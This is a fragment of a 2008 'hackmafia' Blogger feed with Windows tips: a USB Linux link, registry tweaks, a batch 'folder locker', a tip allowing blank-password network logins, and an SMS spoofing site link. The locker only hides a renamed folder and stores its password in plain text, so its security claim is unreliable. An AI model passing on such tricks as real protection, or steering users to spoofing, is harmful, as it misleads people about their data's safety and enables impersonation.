rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-3122567547636782909</id><published>2008-08-19T23:18:00.000-07:00</published><updated>2008-08-19T23:19:48.708-07:00</updated><title type='text'></title><content type='html'>&lt;h3 style="color: rgb(255, 102, 0);" class="smller"&gt;Install OS on your Pendrive.......&lt;/h3&gt; &lt;div class="para"&gt; is possible to install OS on your Pen Drive...but u dosent mentioned which OS u want to install on your pen Drive....&lt;br /&gt;&lt;br /&gt;Thr r lots of Operating System that can be install on your pen drive without much efforts... Here I'm providing u a brief introduction and direct link to download "Damn Small Linux" Operating System..&lt;br /&gt;&lt;br /&gt;"Damn Small Linux" also refer as "DSL" is a Linux distribution operating system that was developed to run even on lower specification systems, including computers which would otherwise go out of use. This distribution is this much small that it can fit inside a 50MB live CD or on any USB Pendrive larger then 64MB.&lt;br /&gt;&lt;br /&gt;Feature:--&lt;br /&gt;Boot from a business card CD as a live linux distribution (LiveCD)&lt;br /&gt;Boot from a USB pen drive&lt;br /&gt;Boot from within a host operating system (that's right, it can run *inside* Windows)&lt;br /&gt;Run very nicely from an IDE Compact Flash drive via a method we call "frugal install"&lt;br /&gt;Transform into a Debian OS with a traditional hard drive install&lt;br /&gt;Run light enough to power a 486DX with 16MB of Ram&lt;br /&gt;Run fully in RAM with as little as 128MB (you will be amazed at how fast your computer can be!)&lt;br /&gt;Modularly grow -- DSL is highly extendable without the need to customize&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Download Link:-- &lt;a href="http://iso.linuxquestions.org/download/http/distro.ibiblio.org/dsl-3.3.iso" target="_blank"&gt;http://iso.linuxquestions.org/download/&lt;wbr&gt;http/distro.ibiblio.org/dsl-3.3.iso&lt;/a&gt;&lt;br /&gt;(Alternate link)&lt;br /&gt;&lt;a href="http://iso.linuxquestions.org/download/ftp/ftp.belnet.be/dsl-3.3.iso" target="_blank"&gt;http://iso.linuxquestions.org/download/&lt;wbr&gt;ftp/ftp.belnet.be/dsl-3.3.iso&lt;/a&gt;&lt;br /&gt;&lt;a href="http://iso.linuxquestions.org/download/http/mirrors.alien2thisworld.net/dsl-3.3.iso" target="_blank"&gt;http://iso.linuxquestions.org/download/&lt;wbr&gt;http/mirrors.alien2thisworld.net/dsl-3.3&lt;wbr&gt;.iso&lt;/a&gt;&lt;br /&gt;&lt;a href="http://iso.linuxquestions.org/download/http/distro.ibiblio.org/dsl-3.3.iso" target="_blank"&gt;http://iso.linuxquestions.org/download/&lt;wbr&gt;http/distro.ibiblio.org/dsl-3.3.iso&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;How To install on your Pen Drive:-- &lt;a href="http://www.pendrivelinux.com/2007/01/02/all-in-one-usb-dsl/" target="_blank"&gt;http://www.pendrivelinux.com/2007/01/02&lt;wbr&gt;/all-in-one-usb-dsl/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;pypiyu......&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-3122567547636782909?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/3122567547636782909/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=3122567547636782909' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3122567547636782909'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/3122567547636782909'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/install-os-on-your-pendrive.html' title=''/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-1472069807605597750</id><published>2008-08-19T23:12:00.000-07:00</published><updated>2008-08-19T23:16:05.993-07:00</updated><title type='text'>password protect ur folders using simple trick!!!!!!!!</title><content type='html'>&lt;h3 style="color: rgb(51, 102, 255);" class="smller"&gt;lock, hide &amp;amp; password protect ur folders!!!!!!!!&lt;/h3&gt; &lt;div class="para"&gt; &lt;b&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;trick to lock folder&lt;br /&gt;using this trick not only for locking folder but also hide it....&lt;br /&gt;&lt;br /&gt;copy following script:-&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;cls&lt;br /&gt;@ECHO OFF&lt;br /&gt;title Folder Locker&lt;br /&gt;if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303&lt;wbr&gt;09D}" goto UNLOCK&lt;br /&gt;if NOT EXIST Locker goto MDLOCKER&lt;br /&gt;:CONFIRM&lt;br /&gt;echo Are you sure u want to Lock the folder(Y/N)&lt;br /&gt;set/p "cho=&gt;"&lt;br /&gt;if %cho%==Y goto LOCK&lt;br /&gt;if %cho%==y goto LOCK&lt;br /&gt;if %cho%==n goto END&lt;br /&gt;if %cho%==N goto END&lt;br /&gt;echo Invalid choice.&lt;br /&gt;goto CONFIRM&lt;br /&gt;:LOCK&lt;br /&gt;ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303&lt;wbr&gt;09D}"&lt;br /&gt;attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303&lt;wbr&gt;09D}"&lt;br /&gt;echo Folder locked&lt;br /&gt;goto End&lt;br /&gt;:UNLOCK&lt;br /&gt;echo Enter password to Unlock folder&lt;br /&gt;set/p "pass=&gt;"&lt;br /&gt;if NOT %pass%==&lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&lt;i&gt;type your password here&lt;/i&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt; goto FAIL&lt;br /&gt;attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303&lt;wbr&gt;09D}"&lt;br /&gt;ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B303&lt;wbr&gt;09D}" Locker&lt;br /&gt;echo Folder Unlocked successfully&lt;br /&gt;goto End&lt;br /&gt;:FAIL&lt;br /&gt;echo Invalid password&lt;br /&gt;goto end&lt;br /&gt;:MDLOCKER&lt;br /&gt;md Locker&lt;br /&gt;echo Locker created successfully&lt;br /&gt;goto End&lt;br /&gt;:End&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 255);"&gt;now go for following few steps&lt;br /&gt;1.paste above text into notepad.&lt;br /&gt;2.the text which is written in &lt;/span&gt;&lt;span style="color: rgb(255, 192, 203);"&gt;&lt;i&gt;pink&lt;/i&gt;&lt;/span&gt;&lt;span style="color: rgb(255, 0, 255);"&gt; letters delete it &amp;amp; type u r password there.&lt;br /&gt;3.save that file by extension .bat ( name is ur choice)&lt;br /&gt;4.now on ur screen there is a bat file appear.&lt;br /&gt;5.double click on that file.&lt;br /&gt;6.a new folder named &lt;/span&gt;&lt;span style="color: rgb(255, 255, 51);"&gt;locker&lt;/span&gt;&lt;span style="color: rgb(255, 0, 255);"&gt; will appear on the screen.&lt;br /&gt;7.keep the files and folders u want to lock in that &lt;/span&gt;&lt;span style="color: rgb(255, 255, 51);"&gt;locker&lt;/span&gt;&lt;span style="color: rgb(255, 0, 255);"&gt; folder.&lt;br /&gt;8.now again double click on that batch file to lock that &lt;/span&gt;&lt;span style="color: rgb(255, 255, 51);"&gt;locker&lt;/span&gt;&lt;span style="color: rgb(255, 0, 255);"&gt;&lt;span style="color: rgb(255, 255, 51);"&gt; &lt;/span&gt;folder.&lt;br /&gt;9.after locking that folder it will become hidden.&lt;br /&gt;10.to open that folder double click on that bat file&lt;br /&gt;11.type ur password &amp;amp; open that folder.&lt;br /&gt;&lt;br /&gt;plz reply ur experience........&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;If ur data will be lost its easy to get this back...........&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#ff00ff;"&gt;&lt;br /&gt;1. just &lt;span style="color:#008400;"&gt;copy the script&lt;/span&gt; from here again.&lt;br /&gt;2. &lt;span style="color:#008400;"&gt;make the batch file&lt;/span&gt; again in the same location.&lt;br /&gt;3. and if u have remembered the password then &lt;span style="color:#008400;"&gt;edit password&lt;/span&gt; in the program.&lt;br /&gt;4. double click on the batch file &amp;amp; u will get the options back to &lt;span style="color:#008400;"&gt;recover ur data&lt;/span&gt;.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-1472069807605597750?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/1472069807605597750/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=1472069807605597750' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1472069807605597750'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1472069807605597750'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/password-protect-ur-folders-using.html' title='password protect ur folders using simple trick!!!!!!!!'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-2435758790812878866</id><published>2008-08-19T23:09:00.000-07:00</published><updated>2008-08-19T23:29:26.865-07:00</updated><title type='text'>SOME TRICKS 2</title><content type='html'>&lt;p&gt;&lt;span style="font-size:130%;"&gt;&lt;strong style="color: rgb(255, 204, 51);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Easy Access to Folders from the Toolbar&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:verdana;"&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&lt;strong&gt;You can quickly access commonly used folders &lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family:verdana;"&gt;&lt;strong&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;from your Toolbar&lt;/span&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;Right click on an open area of the Toolbar&lt;br /&gt;Select Toolbars / New Toolbar&lt;br /&gt;Browse to the directory you want to add&lt;br /&gt;Now on the toolbar you will see the name of that folder displayed.&lt;br /&gt;Click on the &gt;&gt; to open any sub-folders as well.&lt;br /&gt;&lt;a name="119f5fa527842799_organize"&gt;&lt;/a&gt;&lt;strong style="color: rgb(255, 204, 51);"&gt;&lt;span style="color: rgb(255, 0, 0);font-size:130%;" &gt;Organizing the Start / Programs Listing&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;As you add more and more programs, the listing of them in Start / Programs can get fairly long.One solution is to categorize your programs into several groups, create a folder for those groups, and move the shortcuts to those folders.&lt;br /&gt;For example:&lt;br /&gt;Start the Explorer&lt;br /&gt;Go to Windows / Start Menu / Programs&lt;br /&gt;Create new folders with the categories you want (e.g. Graphics, Utilities, Internet etc.)&lt;br /&gt;Now move the shortcuts to those programs in Windows / Start Menu / Programs to whichever category you decide.&lt;br /&gt;This can greatly reduce clutter and make it a lot easier to find your programs.&lt;br /&gt;Note: Windows2000 and WindowsXP Users will need to go to the C:\Documents and Settings\All Users\Start Menu\Programs directory&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;a style="color: rgb(255, 204, 51);" name="119f5fa527842799_restore_desktop"&gt;&lt;/a&gt;&lt;strong&gt;&lt;span style="color: rgb(255, 0, 0);font-size:130%;" &gt;&lt;span style="color: rgb(255, 204, 51);"&gt;Restoring a Lost Desktop&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;If you ever lose the Desktop but Explorer is still running with the Start Button, you can do this to bring back your Desktop in a Windows box.&lt;br /&gt;Click Start&lt;br /&gt;Click Run&lt;br /&gt;Type a period " . "&lt;br /&gt;Then press Enter&lt;br /&gt;Submitted by&lt;br /&gt;&lt;br /&gt;&lt;a name="119f5fa527842799_new_e_mail"&gt;&lt;/a&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color: rgb(255, 204, 51);"&gt;Creating a New E-Mail Shortcut&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;To create a shortcut that will open your default e-mail program starting a new e-mail,&lt;br /&gt;Right click on an open area of the desktop&lt;br /&gt;Select New / Shortcut&lt;br /&gt;For the Command Line, enter mailto:&lt;br /&gt;For the title enter something like New E-Mail&lt;br /&gt;When you click on this your default e-mail program should start with a new e-mail form.&lt;br /&gt;&lt;a name="119f5fa527842799_3d_windows"&gt;&lt;/a&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;span style="color: rgb(255, 0, 0);font-size:130%;" &gt;&lt;span style="color: rgb(255, 204, 51);"&gt;Creating 3D Window Effect&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;You can create a nice 3D effect for your windows&lt;br /&gt;Start Regedit&lt;br /&gt;Go to HKEY_CURRENT_USER \ Control Panel \ Colors&lt;br /&gt;Make sure the following setting are there:&lt;br /&gt;ButtonHilight=128 128 128&lt;br /&gt;ButtonShadow=255 255 255 &lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;a name="119f5fa527842799_logoff_icon"&gt;&lt;/a&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color: rgb(255, 204, 51);"&gt;Creating Shutdown, Restart and Logoff Icons&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;To create the icons, create a shortcut on the desktop.&lt;br /&gt;For Shutdown, the command is C:\WINDOWS\RUNDLL.EXE user.exe,exitwindows&lt;br /&gt;For Restart, the command is C:\WINDOWS\RUNDLL.EXE user.exe,exitwindowsexec&lt;br /&gt;For Logoff, the command is C:\WINDOWS\RUNDLL.EXE shell32.dll,SHExitWindowsEx 0&lt;br /&gt;&lt;a name="119f5fa527842799_sort_order"&gt;&lt;/a&gt;&lt;span style="color: rgb(255, 0, 0);font-size:130%;" &gt;&lt;strong&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="color: rgb(255, 204, 51);"&gt;&lt;span style="color: rgb(255, 0, 0);font-size:130%;" &gt;&lt;strong&gt;Having your Favorites and Start Menus Sort Alphabetically&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;&lt;strong&gt;&lt;/strong&gt;&lt;br /&gt;If your Start Menu Program or Favorites are not sorting alphabetically, it is easy to fix this:&lt;br /&gt;Start Regedit&lt;br /&gt;Go to HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/MenuOrder&lt;br /&gt;Under here is are Favorites and Start Menu folders&lt;br /&gt;In each there is a value called Order&lt;br /&gt;Simply delete (or rename this) and restart Winodws&lt;br /&gt;Your Favorites or Start Menus should now sort alphabetically&lt;br /&gt;&lt;a name="119f5fa527842799_cached_icons"&gt;&lt;br /&gt;&lt;/a&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;&lt;span style="font-size:130%;"&gt;&lt;strong style="color: rgb(255, 204, 51);"&gt;Increasing the Icon Cache&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;Run Regedit&lt;br /&gt;Go to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer&lt;br /&gt;Create a new string called Max Cached Icons&lt;br /&gt;Give it a value of 10000&lt;br /&gt;This will increase response time in windows and give the Shellicon cache file more elbow room.&lt;br /&gt;&lt;br /&gt;&lt;a name="119f5fa527842799_icon_color"&gt;&lt;/a&gt;&lt;strong&gt;&lt;span style="color: rgb(255, 0, 0);font-size:130%;" &gt;&lt;span style="color: rgb(255, 204, 51);"&gt;Make Icons 256 Color 16-Bit&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;Open the Registry&lt;br /&gt;Hit Ctrl+F&lt;br /&gt;Type Shell Icon BPP&lt;br /&gt;When found, right click the Shell Icon BPP icon&lt;br /&gt;Click Modify&lt;br /&gt;Change the value from 4 to 16&lt;br /&gt;Click Ok&lt;br /&gt;Close the registry&lt;br /&gt;Restart your computer&lt;br /&gt;&lt;br /&gt;&lt;a name="119f5fa527842799_shortcut_arrows"&gt;&lt;/a&gt;&lt;strong style="color: rgb(255, 204, 51);"&gt;&lt;span style="color: rgb(255, 0, 0);font-size:130%;" &gt;Removing Shortcut Arrows&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;An easy way to remove those irritating arrows from your desktop shortcut icons and not change their properties&lt;br /&gt;Right click the Desktop / Properties / Appearance tab&lt;br /&gt;Select Item&lt;br /&gt;Scroll for Icon&lt;br /&gt;The default size is 32&lt;br /&gt;Change this to 30&lt;br /&gt;Clicking Apply&lt;br /&gt;&lt;br /&gt;&lt;a name="119f5fa527842799_control_panel_start_menu"&gt;&lt;/a&gt;&lt;strong&gt;&lt;span style="color: rgb(255, 0, 0);font-size:130%;" &gt;&lt;span style="color: rgb(255, 204, 51);"&gt;Adding the Control Panel to the Start Menu&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;Open up the Explorer&lt;br /&gt;Go to \WINDOWS\Start Menu&lt;br /&gt;Right click in the right-hand panel&lt;br /&gt;Add a new folder&lt;br /&gt;Name it Control Panel.{21ec2020-3aea-1069-a2dd-08002b30309d}&lt;br /&gt;This makes getting to the Control Panel items a little easier&lt;br /&gt;&lt;br /&gt;&lt;a style="color: rgb(255, 204, 51);" name="119f5fa527842799_permanent"&gt;&lt;/a&gt;&lt;strong style="color: rgb(255, 204, 51);"&gt;&lt;span style="color: rgb(255, 0, 0);font-size:130%;" &gt;Making Desktop Changes Permanent&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;To make changes to the Desktop like window size, positon after rebooting:&lt;br /&gt;Start Regedit&lt;br /&gt;Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer&lt;br /&gt;Create a New Binary Value&lt;br /&gt;Name it NoSaveSettings&lt;br /&gt;Give it a value of 01 00 00 00&lt;br /&gt;&lt;a name="119f5fa527842799_shortcuts_to_desktop"&gt;&lt;/a&gt;&lt;strong&gt;&lt;span style="color: rgb(255, 0, 0);font-size:130%;" &gt;&lt;span style="color: rgb(255, 204, 51);"&gt;Easy Shortcuts on the Desktop&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;Here is an easy way to put shortcuts on the Desktop where they can easily be moved to other group icons.&lt;br /&gt;Using the Explorer, create a SHORTCUT to the \Windows\Desktop directory in your \Windows\SEND TO directory.&lt;br /&gt;Now whenever you want to make a shortcut and move it to the desktop:&lt;br /&gt;Just make the shortcut you want using Explorer&lt;br /&gt;Right click on that shortcut&lt;br /&gt;In the pop up menu select the Send To and Desktop shortcut&lt;br /&gt;&lt;span style="font-size:180%;"&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204); font-weight: bold;"&gt;                Sms spoofing &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.sharpmail.co.uk/" target="_blank"&gt;www.sharpmail.co.uk&lt;/a&gt; chek this site for sms spoofing&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PYPIYU.............&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-2435758790812878866?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/2435758790812878866/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=2435758790812878866' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2435758790812878866'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/2435758790812878866'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2008/08/some-tricks-2.html' title='SOME TRICKS 2'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-4681523948807590748</id><published>2008-08-19T23:05:00.000-07:00</published><updated>2008-08-19T23:09:56.660-07:00</updated><title type='text'>SOME TRICKS</title><content type='html'>&lt;div class="post-body entry-content"&gt; &lt;p&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color: rgb(255, 204, 51);"&gt;Allowing Network Access with Blank Passwords (XP and Vista)&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;Although you can log in locally without a password, by default, WindowsXP Pro does not allow network users to access the &lt;a href="http://10.10.10.204/exchweb/bin/redir.asp?URL=http://www.onecomputerguy.com/registry_tips.htm%23" target="_blank"&gt;computer&lt;/a&gt; without a password. Typically you will receive an Unknown error 31 if this is the case.&lt;br /&gt;To change this setting:&lt;br /&gt;Run gpedit.msc&lt;br /&gt;Go to &lt;a href="http://10.10.10.204/exchweb/bin/redir.asp?URL=http://www.onecomputerguy.com/registry_tips.htm%23" target="_blank"&gt;Computer Configuration&lt;/a&gt; / Windows Settings / Security Settings / Local Policies / Security Options&lt;br /&gt;Double click on Accounts: Limit local account use of blank passwords to console login only&lt;br /&gt;Disable this option&lt;br /&gt;&lt;strong style="color: rgb(255, 204, 102);"&gt;&lt;span style="font-size:130%;"&gt;Disabling the F3 Search Key&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;/span&gt;&lt;/strong&gt;If you want to disable the ability to use the F3 key from either the Windows Explorer or Internet Explorer&lt;br /&gt;Start &lt;a href="http://10.10.10.204/exchweb/bin/redir.asp?URL=http://www.onecomputerguy.com/registry_tips.htm%23" target="_blank"&gt;Regedit&lt;/a&gt;&lt;br /&gt;Go to HKEY_CURRENT_USER\&lt;a href="http://10.10.10.204/exchweb/bin/redir.asp?URL=http://www.onecomputerguy.com/registry_tips.htm%23" target="_blank"&gt;Software&lt;/a&gt;\Policies\Microsoft\Internet Explorer\Restrictions&lt;br /&gt;Create a Dword value called NoFindFiles&lt;br /&gt;Give it a value of 1&lt;br /&gt;Reboot&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color: rgb(255, 204, 51);"&gt;Preventing Changes to File Associations&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;You can prevent users from changing associations via Windows Explorer's Tools / Folder Options / File Types tab.&lt;br /&gt;Start Regedit&lt;br /&gt;Go to HKEY_CURRENT_USER \ Software \ &lt;a href="http://10.10.10.204/exchweb/bin/redir.asp?URL=http://www.onecomputerguy.com/registry_tips.htm%23" target="_blank"&gt;Microsoft&lt;/a&gt; \ Windows \ CurrentVersion \ Policies \ Explore&lt;br /&gt;Create REG_DWORD data type NoFileAssociate&lt;br /&gt;Give it a value of 1&lt;br /&gt;Submitted by &lt;a href="mailto:pawl@nbnet.nb.ca" target="_blank"&gt;Paul Barker&lt;/a&gt;&lt;br /&gt;&lt;strong style="color: rgb(255, 204, 51);"&gt;&lt;span style="font-size:130%;"&gt;Locking File Associations&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;If you have your file associations the way you want for a particular &lt;a href="http://10.10.10.204/exchweb/bin/redir.asp?URL=http://www.onecomputerguy.com/registry_tips.htm%23" target="_blank"&gt;file type&lt;/a&gt;, you can remove it from the list that gets displayed in the Folder Options / File Types screen&lt;br /&gt;Start Regedit&lt;br /&gt;Go to HKEY_CLASSES_ROOT&lt;br /&gt;Scroll to the file association you want to lock.&lt;br /&gt;In the right panel, create a new Binary value&lt;br /&gt;Call it EditFlags&lt;br /&gt;Give it a value of 01 00 00 00&lt;br /&gt;Now when you go to the Folder Options / File Types screen, you won't see that file type listed.&lt;br /&gt;Submitted by &lt;a href="mailto:pawl@nbnet.nb.ca" target="_blank"&gt;Paul Barker&lt;/a&gt;&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;&lt;/span&gt;&lt;/strong&gt;&lt;p&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Turning off System Beeps&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;If you want to turn off all system beeps (like the ones that go through your computers' internal speaker):&lt;br /&gt;Start Regedit&lt;br /&gt;Go to HKEY_CURRENT_USER\Control Panel\Sound&lt;br /&gt;Edit the key Beep and give it a value of No&lt;br /&gt;Download reg file&lt;br /&gt;&lt;/p&gt;&lt;p style="color: rgb(255, 204, 51);"&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Changing the Location Of Special Folders&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;&lt;/span&gt;&lt;/strong&gt;&lt;p&gt;&lt;br /&gt;You can modify the registry to change the location of special folders like:&lt;br /&gt;My Documents&lt;br /&gt;Favorites&lt;br /&gt;My Pictures&lt;br /&gt;Personal&lt;br /&gt;Start Regedit&lt;br /&gt;Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders&lt;br /&gt;Double click on any locations you want to change and alter the path&lt;br /&gt;Logoff or restart for the changes to go into effect&lt;br /&gt;Note: TweakUI from Microsoft will allow you to make these changes from a &lt;a href="http://10.10.10.204/exchweb/bin/redir.asp?URL=http://www.onecomputerguy.com/registry_tips.htm%23" target="_blank"&gt;dialog box&lt;/a&gt; as well&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;strong style="color: rgb(255, 204, 51);"&gt;&lt;span style="font-size:130%;"&gt;Deleting Specific Registry Value&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;In a previous tip, &lt;a href="http://10.10.10.204/exchange/subhashsingh/Inbox/#delete_registry_key"&gt;Automatically Deleting a Registry Key&lt;/a&gt;, it was mentioned how to remove an entire &lt;a href="http://10.10.10.204/exchweb/bin/redir.asp?URL=http://www.onecomputerguy.com/registry_tips.htm%23" target="_blank"&gt;registry key&lt;/a&gt;.If you want to simply remove a specific value within a key, use the syntax below:&lt;br /&gt;[Registry Key]"value"=-&lt;br /&gt;For example:&lt;br /&gt;REGEDIT4[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "MSConfig"=-&lt;br /&gt;would delete the value MSCONFIG.&lt;br /&gt;Submitted by &lt;a href="mailto:brent.towsley@usask.ca" target="_blank"&gt;Brent Towsley&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;strong style="color: rgb(255, 204, 51);"&gt;&lt;span style="font-size:130%;"&gt;Setting the Recycle Bin to Always Delete&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;You can set the recycle bin to always delete items (like holding down the shift key when dragging files to the recycle bin)&lt;br /&gt;Start Regedit&lt;br /&gt;Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ BitBucket&lt;br /&gt;Set the key NukeOnDelete to 1&lt;br /&gt;Download reg file&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Setting the Internet Explorer Home Page&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;If you want to set the home page used by Internet Explorer through the registry&lt;br /&gt;Start Regedit&lt;br /&gt;Go to HKey_Current_User \ Software \ Microsoft \ Internet Explorer \ Main&lt;br /&gt;Give the &lt;a href="http://10.10.10.204/exchweb/bin/redir.asp?URL=http://www.onecomputerguy.com/registry_tips.htm%23" target="_blank"&gt;Start Page&lt;/a&gt; key the string value you wish set as homepage&lt;br /&gt;Submitted by &lt;a href="mailto:KAHenderson@firstfleetinc.com" target="_blank"&gt;Austin Henderson&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;strong style="color: rgb(255, 204, 51);"&gt;&lt;span style="font-size:130%;"&gt;Preparing to Move &lt;/span&gt;&lt;/strong&gt;&lt;a style="color: rgb(255, 204, 51);" 